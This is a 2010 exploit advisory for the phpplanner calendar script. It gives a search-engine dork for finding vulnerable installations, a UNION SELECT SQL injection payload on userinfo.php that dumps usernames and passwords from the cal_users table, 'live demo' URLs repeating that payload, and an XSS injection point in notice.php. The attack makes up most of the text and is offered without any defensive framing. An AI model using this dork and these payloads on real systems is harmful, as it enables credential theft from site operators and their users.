47 lines
No EOL
1.4 KiB
Text
47 lines
No EOL
1.4 KiB
Text
==================================
|
|
phpplanner XSS / SQL Vulnerability
|
|
==================================
|
|
|
|
# Script: php planner
|
|
# Date: 12-06-2010
|
|
# Author: anT!-Tr0J4n
|
|
#My Home : www.Dev-PoinT.com
|
|
# Software Link:http://phpplanner.sourceforge.net/
|
|
# Tested on: Win7/Linux
|
|
#DorK : inurl:/phpplanner/userinfo.php?userid=
|
|
-----------------------------------
|
|
Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/Coffin Of Evil/HoBeeZ/mahmoudvip/Mr.Mh$TEr / M [Zero] /Cyber-Err0r/
|
|
R3d-D3v1l (ALL sEc-r1z crEw) / saLman EL anz33 /NASHY / MR.FaHeD /EnerGiZeR/MiZR /almoomia/Nasraoui sameim && All Muslim's
|
|
|
|
========== Exploit By anT!-Tr0J4n============
|
|
|
|
[>] exploit -> phpplanner SQL Vulnerability
|
|
|
|
http://127.0.0.1/phpplanner/userinfo.php?userid=[sql]
|
|
|
|
[>] Poc
|
|
|
|
+union+select+concat(username,0x3a,password),2,3,4,5,6+from%20cal_users
|
|
|
|
[>] Live D3MO:
|
|
|
|
http://server/calendar/userinfo.php?userid=-3+union+select+concat%28username,0x3a,password%29,2,3,4,5,6+from%20cal_users
|
|
|
|
http://server/phpplanner/userinfo.php?userid=-3+union+select+username,2,3,4,password,6+from%20cal_users
|
|
|
|
#########################################
|
|
|
|
[>] exploit -> XSS Vulnerability
|
|
|
|
http://127.0.0.1/phpplanner/notice.php?msg=[XSS]
|
|
|
|
http://server/path/notice.php?msg=
|
|
|
|
|
|
===============ABDO-R3ZK==================
|
|
|
|
MY HomE : www.Dev-PoinT.com
|
|
Author : anT!-Tr0J4n
|
|
EmaiL : D3v-PoinT@Hotmail.com & C1EH@Hotmail.com
|
|
# ./Done .
|
|
===============ABDO-R3ZK================== |